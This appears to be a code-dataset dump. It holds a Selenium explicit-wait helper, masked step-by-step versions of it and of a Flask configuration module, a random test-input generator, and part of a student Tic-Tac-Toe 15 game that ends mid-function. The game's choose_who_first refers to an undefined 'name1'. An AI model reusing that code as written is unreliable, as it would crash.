        return getattr(webdriver, factory_names[browser])()
    print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
    return None
class Base:
    """Thin explicit-wait wrapper around a Selenium WebDriver.

    Page objects hold a Base around a live driver so that locating,
    clicking and typing all share the same WebDriverWait logic.
    """

    def __init__(self, driver):
        # driver: a live selenium webdriver instance (see open_browser above)
        self.driver = driver

    def open_url(self, url):
        """Navigate to *url* and maximize the browser window."""
        self.driver.get(url)
        self.driver.maximize_window()

    def find_element(self, locator, timeout=10):
        """Wait up to *timeout* seconds for the element at *locator* and return it."""
        element = WebDriverWait(self.driver, timeout).until(EC.
            presence_of_element_located(locator))
        return element

    def find_elements(self, locator, timeout=10):
        """Wait up to *timeout* seconds and return all elements matching *locator*."""
        elements = WebDriverWait(self.driver, timeout).until(EC.
            presence_of_all_elements_located(locator))
        return elements

    def click(self, locator, timeout=10):
        """Wait for the element at *locator*, then click it."""
        element = self.find_element(locator=locator, timeout=timeout)
        element.click()

    def send_keys(self, locator, text, timeout=10):
        """Wait for the element at *locator*, clear its content and type *text*."""
        element = self.find_element(locator=locator, timeout=timeout)
        element.clear()
        element.send_keys(text)

    def is_text_in_element(self, locator, text, timeout=10):
        """Return truthy when *text* appears in the element within *timeout*; False otherwise."""
        try:
            result = WebDriverWait(self.driver, timeout=timeout).until(EC.
                text_to_be_present_in_element(locator, text))
            return result
        # narrowed from a bare except: don't swallow SystemExit/KeyboardInterrupt
        except Exception:
            return False

    def is_value_in_element(self, locator, value, timeout=10):
        """Return truthy when the element's value attribute contains *value*; False otherwise."""
        try:
            result = WebDriverWait(self.driver, timeout=timeout).until(EC.
                text_to_be_present_in_element_value(locator, value))
            return result
        # narrowed from a bare except for the same reason as above
        except Exception:
            return False

    def close_browser(self):
        """Quit the driver, closing every window it owns."""
        self.driver.quit()
<|reserved_special_token_1|>
import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_browser(browser="chrome"):
    """Launch and return a Selenium WebDriver for *browser*.

    Supported (case-sensitive) values are "chrome", "firefox" and "ie".
    Any other value prints a usage hint and returns None.
    """
    driver = None
    if browser == "chrome":
        driver = webdriver.Chrome()
    elif browser == "firefox":
        driver = webdriver.Firefox()
    elif browser == "ie":
        driver = webdriver.Ie()
    else:
        # unsupported name: leave driver as None and tell the user
        print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
    return driver
class Base:
    """Reusable Selenium helper built on explicit waits.

    Wraps a live webdriver so that locating, clicking and typing all
    share the same WebDriverWait logic.
    """

    def __init__(self, driver):
        # driver: a live selenium webdriver (see open_browser above)
        self.driver = driver

    def open_url(self, url):
        """Open *url* in the browser."""
        self.driver.get(url)
        self.driver.maximize_window()  # maximize the browser window

    def find_element(self, locator, timeout=10):
        """Wait up to *timeout* seconds for the element at *locator* and return it."""
        element = WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located(locator))
        return element

    def find_elements(self, locator, timeout=10):
        """Wait up to *timeout* seconds and return all elements matching *locator*."""
        elements = WebDriverWait(self.driver, timeout).until(EC.presence_of_all_elements_located(locator))
        return elements

    def click(self, locator, timeout=10):
        """Wait for the element at *locator*, then click it."""
        element = self.find_element(locator=locator, timeout=timeout)
        element.click()

    def send_keys(self, locator, text, timeout=10):
        """Wait for the element at *locator*, clear its content and type *text*."""
        element = self.find_element(locator=locator, timeout=timeout)
        element.clear()
        element.send_keys(text)

    def is_text_in_element(self, locator, text, timeout=10):
        """Return truthy when *text* appears in the element within *timeout*; False otherwise."""
        try:
            result = WebDriverWait(self.driver, timeout=timeout).until(EC.text_to_be_present_in_element(locator, text))
            return result
        except:
            # any failure (timeout, stale element, ...) is reported as "not present"
            return False

    def is_value_in_element(self, locator, value, timeout=10):
        """Return truthy when the element's value attribute contains *value*; False otherwise."""
        try:
            result = WebDriverWait(self.driver, timeout=timeout).until(
                EC.text_to_be_present_in_element_value(locator, value))
            return result
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt — consider narrowing
            return False

    def close_browser(self):
        """Quit the driver, closing every window it owns."""
        self.driver.quit()
|
flexible
|
{
"blob_id": "82fc86e44d02c45d7904139e4dfdff069e2bdb90",
"index": 5634,
"step-1": "<mask token>\n\n\nclass Base:\n <mask token>\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n <mask token>\n <mask token>\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Base:\n\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_all_elements_located(locator))\n return elements\n <mask token>\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n",
"step-3": "<mask token>\n\n\ndef open_browser(browser='chrome'):\n driver = None\n if browser == 'chrome':\n driver = webdriver.Chrome()\n elif browser == 'firefox':\n driver = webdriver.Firefox()\n elif browser == 'ie':\n driver = webdriver.Ie()\n else:\n print(\"请输入正确的浏览器,例如'chrome','Firefox','ie'\")\n return driver\n\n\nclass Base:\n\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.click()\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n",
"step-4": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef open_browser(browser='chrome'):\n driver = None\n if browser == 'chrome':\n driver = webdriver.Chrome()\n elif browser == 'firefox':\n driver = webdriver.Firefox()\n elif browser == 'ie':\n driver = webdriver.Ie()\n else:\n print(\"请输入正确的浏览器,例如'chrome','Firefox','ie'\")\n return driver\n\n\nclass Base:\n\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window()\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.\n presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.click()\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.\n text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n",
"step-5": "import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef open_browser(browser=\"chrome\"):\n driver = None\n if browser == \"chrome\":\n driver = webdriver.Chrome()\n elif browser == \"firefox\":\n driver = webdriver.Firefox()\n elif browser == \"ie\":\n driver = webdriver.Ie()\n else:\n # driver = None\n print(\"请输入正确的浏览器,例如'chrome','Firefox','ie'\")\n return driver\n\n\nclass Base:\n def __init__(self, driver):\n self.driver = driver\n\n def open_url(self, url):\n self.driver.get(url)\n self.driver.maximize_window() # 窗口最大化\n\n def find_element(self, locator, timeout=10):\n element = WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator, timeout=10):\n elements = WebDriverWait(self.driver, timeout).until(EC.presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.click()\n\n def send_keys(self, locator, text, timeout=10):\n element = self.find_element(locator=locator, timeout=timeout)\n element.clear()\n element.send_keys(text)\n\n def is_text_in_element(self, locator, text, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(EC.text_to_be_present_in_element(locator, text))\n return result\n except:\n return False\n\n def is_value_in_element(self, locator, value, timeout=10):\n try:\n result = WebDriverWait(self.driver, timeout=timeout).until(\n EC.text_to_be_present_in_element_value(locator, value))\n return result\n except:\n return False\n\n def close_browser(self):\n self.driver.quit()\n\n\n\n",
"step-ids": [
6,
9,
11,
12,
13
]
}
|
[
6,
9,
11,
12,
13
] |
<|reserved_special_token_0|>
class Config:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if os.path.exists('/etc/config.json'):
with open('/etc/config.json') as config_file:
config = json.load(config_file)
else:
with open('dev_config.json') as config_file:
config = json.load(config_file)
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
basedir = os.path.abspath(os.path.dirname(__file__))
if os.path.exists('/etc/config.json'):
with open('/etc/config.json') as config_file:
config = json.load(config_file)
else:
with open('dev_config.json') as config_file:
config = json.load(config_file)
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'
) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,
'../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
config = {'development': DevelopmentConfig, 'testing': TestingConfig,
'production': ProductionConfig}
<|reserved_special_token_1|>
import os
import json
basedir = os.path.abspath(os.path.dirname(__file__))
# CHECK IF PRODUCTION CONFIG EXISTS
if os.path.exists('/etc/config.json'):
with open('/etc/config.json') as config_file:
config = json.load(config_file)
else:
with open('dev_config.json') as config_file:
config = json.load(config_file)
class Config:
SECRET_KEY = config.get('SECRET_KEY')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')
MAIL_PORT = int(config.get('MAIL_PORT', '465'))
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = config.get('MAIL_USERNAME')
MAIL_PASSWORD = config.get('MAIL_PASSWORD')
MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')
MAIL_SENDER = config.get('MAIL_SENDER')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig
}
|
flexible
|
{
"blob_id": "1f7147c914eee37776c0418575e93e3d36ee3aa5",
"index": 7099,
"step-1": "<mask token>\n\n\nclass Config:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n",
"step-3": "<mask token>\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n",
"step-4": "<mask token>\nbasedir = os.path.abspath(os.path.dirname(__file__))\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {'development': DevelopmentConfig, 'testing': TestingConfig,\n 'production': ProductionConfig}\n",
"step-5": "import os\nimport json\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# CHECK IF PRODUCTION CONFIG EXISTS\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig\n}\n",
"step-ids": [
7,
9,
10,
11,
13
]
}
|
[
7,
9,
10,
11,
13
] |
import random
prime=[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]
t=100
print(t)
n=25
for _ in range(t):
a=random.randint(1,n)
b=random.choice(prime)
print(a,b)
for _ in range(a):
print(random.randint(1,n),end=" ")
print("")
|
normal
|
{
"blob_id": "16738e7d89bee8074f39d0b3abc3fa786faf081f",
"index": 2370,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(t)\n<mask token>\nfor _ in range(t):\n a = random.randint(1, n)\n b = random.choice(prime)\n print(a, b)\n for _ in range(a):\n print(random.randint(1, n), end=' ')\n print('')\n",
"step-3": "<mask token>\nprime = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\nt = 100\nprint(t)\nn = 25\nfor _ in range(t):\n a = random.randint(1, n)\n b = random.choice(prime)\n print(a, b)\n for _ in range(a):\n print(random.randint(1, n), end=' ')\n print('')\n",
"step-4": "import random\nprime = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\nt = 100\nprint(t)\nn = 25\nfor _ in range(t):\n a = random.randint(1, n)\n b = random.choice(prime)\n print(a, b)\n for _ in range(a):\n print(random.randint(1, n), end=' ')\n print('')\n",
"step-5": "import random\nprime=[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\nt=100\nprint(t)\nn=25\nfor _ in range(t):\n a=random.randint(1,n)\n b=random.choice(prime)\n print(a,b)\n for _ in range(a):\n print(random.randint(1,n),end=\" \")\n print(\"\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Name: Calvin Liew
# Date: 2021-01-29
# Purpose: Video game final project, Tic-Tac-Toe 15 by Calvin Liew.
import random
# Function that reminds the users of the game rules and other instructions.
def intro():
print("""\n####### ####### ####### # #######
# # #### # ## #### # #### ###### ## #
# # # # # # # # # # # # # # # #
# # # ##### # # # # ##### # # # ##### # ######
# # # # ###### # # # # # # #
# # # # # # # # # # # # # # # #
# # #### # # # #### # #### ###### ##### #####
How to play Tic-Tac-Toe 15:
To win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers.
Board Instructions: Tell the program the position of which you would like to enter by entering the number position of
the boxes as shown below. Players can can only enter from numbers from 1-9.
| |
1 | 2 | 3
_____|_____|_____
| |
4 | 5 | 6
_____|_____|_____
| |
7 | 8 | 9
| |
""")
# Function that prints the tic-tac-toe board.
def print_board(board):
print("\n\t | |")
print("\t {} | {} | {}".format(board[0], board[1], board[2]))
print('\t_____|_____|_____')
print("\t | |")
print("\t {} | {} | {}".format(board[3], board[4], board[5]))
print('\t_____|_____|_____')
print("\t | |")
print("\t {} | {} | {}".format(board[6], board[7], board[8]))
print("\t | |")
# Function that chooses who goes first and assigns the player order.
def choose_who_first(player1, player2, player_order):
flip = random.randint(1, 2)
if flip == 1:
print("\n" + player1, "goes first.", player1, "can only play odd numbers and", player2,
"can only play even numbers from 1-9. ")
print()
player_order.append(player1)
player_order.append(player2)
return player1
elif flip == 2:
print("\n" + player2, "goes first.", player2, "can only play odd numbers and", name1,
"can only play even numbers from 1-9. ")
print()
player_order.append(player2)
player_order.append(player1)
return player2
# Function that calls the print_board() function as well as makes the moves that the players provide while checking if the moves are legal or not.
def make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order):
odd_moves = [1, 3, 5, 7, 9]
even_moves = [2, 4, 6, 8]
try:
if turn == player1:
print("\nIts your turn", player1 + ": ")
print()
p1_move_input = int(input("Move to which space? (1-9): "))
if player_order[0] == player1:
if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:
print()
p1_num_input = int(input("Enter an ODD NUMBER from 1-9: "))
if p1_num_input in odd_moves and p1_num_input not in unavailable_moves_p1:
the_board[p1_move_input - 1] = p1_num_input
unavailable_moves_p1.append(p1_num_input)
elif p1_num_input in unavailable_moves_p1:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an ODD number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p1_move_input < 1 or p1_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif player_order[1] == player1:
if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:
print()
p1_num_input = int(input("Enter a EVEN NUMBER from 1-9: "))
if p1_num_input in even_moves and p1_num_input not in unavailable_moves_p1:
the_board[p1_move_input - 1] = p1_num_input
unavailable_moves_p1.append(p1_num_input)
elif p1_num_input in unavailable_moves_p1:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter a EVEN number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p1_move_input < 1 or p1_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
if turn == player2:
print("\nIts your turn", player2 + ": ")
print()
p2_move_input = int(input("Move to which space? (1-9): "))
if player_order[0] == player2:
if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:
print()
p2_num_input = int(input("Enter an ODD NUMBER from 1-9: "))
if p2_num_input in odd_moves and p2_num_input not in unavailable_moves_p2:
the_board[p2_move_input - 1] = p2_num_input
unavailable_moves_p2.append(p2_num_input)
elif p2_num_input in unavailable_moves_p2:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an ODD number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p2_move_input < 1 or p2_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif player_order[1] == player2:
if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:
print()
p2_num_input = int(input("Enter a EVEN NUMBER from 1-9: "))
if p2_num_input in even_moves and p2_num_input not in unavailable_moves_p2:
the_board[p2_move_input - 1] = p2_num_input
unavailable_moves_p2.append(p2_num_input)
elif p2_num_input in unavailable_moves_p2:
